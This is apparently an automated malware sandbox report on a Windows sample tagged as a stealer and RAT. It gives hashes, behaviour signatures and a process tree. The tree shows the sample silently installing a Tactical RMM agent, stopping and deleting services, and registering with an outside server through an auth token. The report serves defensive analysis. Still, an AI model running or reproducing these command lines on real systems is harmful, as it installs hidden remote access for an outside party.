Overview

overview

8

Static

static

3

2024-11-19...ch.exe

windows7-x64

1

2024-11-19...ch.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    94s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/11/2024, 13:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-11-19_a29ed5c94563aaf6908124c90b17fc33_frostygoop_luca-stealer_poet-rat_snatch.exe

  • Size

    5.0MB

  • MD5

    a29ed5c94563aaf6908124c90b17fc33

  • SHA1

    f55fa19a81c788d35516170cac51058b011e4ac8

  • SHA256

    cab0710ff3dfc47b8cf4ccea235af9914fadf7ebe1a09acbbf8abe646a885667

  • SHA512

    f7fe9034a368d9e80d49b5bb9d9ad3a5297bc2748e538c227303d860e86ad286c93cc61087be5a1e9c3f745d3f2558021313b11791c011af157dafb32b9000ca

  • SSDEEP

    49152:JQ/lTzPN+tedV9nrb/T8vO90d7HjmAFd4A64nsfJJ6COtrzA4Xe1FxU1T/RX7BuR:6N+tedV5aQw1DPutbREm+eb

Score
8/10
discoveryevasionexecution

Malware Config

Signatures

  • Stops running service(s) 4 TTPs
    evasionexecution
  • Executes dropped EXE 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops file in Program Files directory 6 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies system certificate store 2 TTPs 3 IoCs
    evasionspywaretrojan
  • Runs net.exe
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-11-19_a29ed5c94563aaf6908124c90b17fc33_frostygoop_luca-stealer_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-11-19_a29ed5c94563aaf6908124c90b17fc33_frostygoop_luca-stealer_poet-rat_snatch.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:384
    • C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe
      C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe /VERYSILENT /SUPPRESSMSGBOXES
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4796
      • C:\Users\Admin\AppData\Local\Temp\is-P6SDU.tmp\tacticalagent-v2.8.0-windows-amd64.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-P6SDU.tmp\tacticalagent-v2.8.0-windows-amd64.tmp" /SL5="$9015A,3652845,825344,C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe" /VERYSILENT /SUPPRESSMSGBOXES
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1652
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrpc
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:2412
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 2
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:1564
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalrpc
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4104
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalrpc
              6⤵
              • System Location Discovery: System Language Discovery
              PID:632
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c net stop tacticalagent
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2384
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalagent
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4964
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalagent
              6⤵
              • System Location Discovery: System Language Discovery
              PID:3280
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrmm
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:1156
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 2
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:4856
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalrmm
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4020
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalrmm
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1656
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c taskkill /F /IM tacticalrmm.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1568
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM tacticalrmm.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3936
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c sc delete tacticalagent
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4748
          • C:\Windows\SysWOW64\sc.exe
            sc delete tacticalagent
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:3004
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c sc delete tacticalrpc
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1448
          • C:\Windows\SysWOW64\sc.exe
            sc delete tacticalrpc
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:4540
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c tacticalrmm.exe -m installsvc
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2152
          • C:\Program Files\TacticalAgent\tacticalrmm.exe
            tacticalrmm.exe -m installsvc
            5⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:892
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c net start tacticalrmm
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3700
          • C:\Windows\SysWOW64\net.exe
            net start tacticalrmm
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3940
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 start tacticalrmm
              6⤵
              • System Location Discovery: System Language Discovery
              PID:468
    • C:\Program Files\TacticalAgent\tacticalrmm.exe
      "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m install --api https://api.corumba.digital --client-id 24 --site-id 104 --agent-type workstation --auth 87766753a9b1429e935f6f03ece6e11342734e57afa9f5322b36f1b8e76c8c14
      2⤵
      • Executes dropped EXE
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1628

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Program Files\TacticalAgent\tacticalrmm.exe
    Filesize

    9.2MB

    MD5

    6cfbd2da5f304a3b8972eafe6fe4d191

    SHA1

    09c1600064cb9d157c55c88f76f107373404b2ae

    SHA256

    ad29d4e9e01870ffbdb6f2498e6ce36a708e56db2ad431ba2d80bf5a6caac069

    SHA512

    03a29d2eb00a97b3fc83e55a8b8b1fe3e7adbb06fe598ed5525bb3764caced0bf5a28a3fd70e36b66687fcce5a9e7c9243ee6ab3a82d394044f3c60714a423e8

    Download Submit

  • C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe
    Filesize

    4.3MB

    MD5

    ed40540e7432bacaa08a6cd6a9f63004

    SHA1

    9c12db9fd406067162e9a01b2c6a34a5c360ea97

    SHA256

    d6c7bdab07151678b713a02efe7ad5281b194b0d5b538061bdafdf2c4ca1fdaa

    SHA512

    07653d534a998248f897a2ed962d2ec83947c094aa7fe4fb85e40cb2771754289fe2cef29e31b5aa08e8165d5418fe1b8049dedc653e799089d5c13e02352e8d

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\is-P6SDU.tmp\tacticalagent-v2.8.0-windows-amd64.tmp
    Filesize

    3.0MB

    MD5

    a639312111d278fee4f70299c134d620

    SHA1

    6144ca6e18a5444cdb9b633a6efee67aff931115

    SHA256

    4b0be5167a31a77e28e3f0a7c83c9d289845075b51e70691236603b1083649df

    SHA512

    f47f01d072ff9ed42f5b36600ddfc344a6a4b967c1b671ffc0e76531e360bfd55a1a9950305ad33f7460f3f5dd8953e317b108cd434f2db02987fa018d57437c

    Download Submit

  • memory/1652-12-0x0000000000400000-0x0000000000712000-memory.dmp

    Filesize

    3.1MB

    Download

  • memory/1652-26-0x0000000000400000-0x0000000000712000-memory.dmp

    Filesize

    3.1MB

    Download

  • memory/4796-8-0x0000000000401000-0x00000000004B7000-memory.dmp

    Filesize

    728KB

    Download

  • memory/4796-5-0x0000000000400000-0x00000000004D7000-memory.dmp

    Filesize

    860KB

    Download

  • memory/4796-27-0x0000000000400000-0x00000000004D7000-memory.dmp

    Filesize

    860KB

    Download